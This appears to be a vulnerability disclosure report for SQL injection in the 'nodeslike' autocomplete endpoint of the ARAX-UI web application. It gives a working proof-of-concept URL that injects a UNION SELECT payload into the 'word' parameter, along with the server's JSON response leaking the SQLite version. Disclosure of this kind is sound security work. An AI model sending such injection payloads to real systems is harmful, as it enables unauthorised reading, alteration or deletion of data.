Description

The /rtxcomplete/nodeslike endpoint in the ARAX-UI application at https://arax.rtx.ai is vulnerable to SQL injection. It is possible to include a malicious SQL payload in the word query parameter for this endpoint that would allow an attacker to dump the database, make modifications to data, or delete data. In addition it is possible to completely takeover the server where the application is hosted, by performing remote code execution via this vulnerability.

Proof of Concept

Perform a GET request to:

https://arax.rtx.ai/rtxcomplete/nodeslike?word=test\" UNION SELECT sqlite_version()---&limit=15&callback=jQuery33105838363973705006_1650064361901&_=1650064362018

The server will return JSON in the HTTP response, with the SQLite version as “3.11.0” as part of the first item in the array:

jQuery33105838363973705006_1650064361901([{"curie": "??", "name": "3.11.0", "type": "??"}, {"curie": "??", "name": "Testa-C", "type": "??"}, {"curie": "??", "name": "testacea group", "type": "??"}, {"curie": "??", "name": "Testacella", "type": "??"}, {"curie": "??", "name": "Testacella haliotidea", "type": "??"}, {"curie": "??", "name": "Testacella maugei", "type": "??"}, {"curie": "??", "name": "Testacella scutulum", "type": "??"}, {"curie": "??", "name": "Testacella sp. NMW.Z", "type": "??"}, {"curie": "??", "name": "Testacellidae", "type": "??"}, {"curie": "??", "name": "testase 4, human", "type": "??"}, {"curie": "??", "name": "Testate", "type": "??"}, {"curie": "??", "name": "Testechiniscus", "type": "??"}, {"curie": "??", "name": "Testechiniscus spitsbergensis", "type": "??"}, {"curie": "??", "name": "tested for", "type": "??"}, {"curie": "??", "name": "Tested for HIV", "type": "??"}]);